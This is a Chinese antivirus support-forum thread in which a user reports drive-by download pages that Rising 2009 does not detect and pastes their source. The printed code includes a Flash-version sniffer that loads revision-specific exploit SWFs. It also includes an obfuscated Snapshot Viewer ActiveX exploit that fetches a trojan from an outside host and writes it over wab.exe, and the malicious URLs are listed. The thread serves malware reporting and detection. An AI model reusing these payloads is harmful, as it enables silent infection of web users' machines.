瑞星卡卡安全论坛

http://baiduduyou4.cn/b082222/xlink.html
原代码如下:

<script type="text/javascript" src="swfobject.js"></script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script language =javascript>
var jmsixp208=deconcept.SWFObjectUtil.getPlayerVersion();if(jmsixp208['major']==9){document.getElementById('flashversion').innerHTML="";if(jmsixp208['rev']==115){var so=new SWFObject("x15.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(jmsixp208['rev']==64){var so=new SWFObject("x64.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(jmsixp208['rev']==47){var so=new SWFObject("x47.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(jmsixp208['rev']==45){var so=new SWFObject("x45.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(jmsixp208['rev']==28){var so=new SWFObject("x28.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(jmsixp208['rev']==16){var so=new SWFObject("x16.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(jmsixp208['rev']>=124){if(document.getElementById){document.getElementById('flashversion').innerHTML=""}}}
</script>
瑞星2009,版本号21.19.01

http://wm.sllgqsb.cn/a111/../a1/sina.htm
原代码如下:
<script type="text/javascript">
function rpppr()
{
return true;
}
window.onerror = rpppr;
var x;
var oootuso;
var tu_bj = new Array();
tu_bj[0] = "c:/Program Files/Outlook Express/wab.exe";
tu_bj[1] = "d:/Program Files/Outlook Express/wab.exe";
tu_bj[2] = "e:/Program Files/Outlook Express/wab.exe";
var p33333s333333spspq = new ActiveXObject("\x73\x6e\x70\x76\x77\x2e\x53\x6e\x61\x70\x73\x68\x6f\x74 \x56"+"\x69\x65\x77\x65\x72\x43\x6f\x6e\x74\x72\x6f\x6c\x2e\x31");
if(p33333s333333spspq="[object]")
{
setTimeout('window.location = "ldap://"',3000);
for (x in tu_bj)
{
oootuso = new ActiveXObject("\x73\x6e\x70\x76\x77\x2e\x53\x6e\x61\x70\x73\x68\x6f\x74 \x56\x69\x65\x77\x65\x72\x43\x6f\x6e\x74\x72\x6f\x6c\x2e\x31")
var tuf1 = 'http://d.ko546.com/new/a1.css';
var tuf2=tu_bj[x];
oootuso.Zoom = 0;
oootuso.ShowNavigationButtons = false;
oootuso.AllowContextMenu = false;
oootuso.SnapshotPath = tuf1;
try
{
oootuso["\x43\x6f\x6d\x70\x72\x65\x73\x73\x65\x64\x50\x61\x74\x68"] = tuf2;
oootuso["\x0050\x0072\x0069\x006e\x0074\x0053\x006e\x0061\x0070\x0073\x0068\x006f\x0074"]();
}catch(e){}
}
}
var fkasacv="BS";var fkqhasacv="BS";
</script>

解密后,木马下载地址http://d.ko546.com/new/a1.css

这个也没报
http://wm.sllgqsb.cn/a111/../a1/real.htm

这两个网页病毒代码也不报
http://baiduduyou4.cn/b082222/../real10.htm
http://wm.sllgqsb.cn/a111/../a1/no.htm

希望快点解决更新:default5: :default5:

感谢楼主的上报，相信很快就会进行处理。:default7:

我在两个星期前反馈的一个网页漏洞,好象是新浪的吧,这几天才更新........这个处理速度啊,需要提高了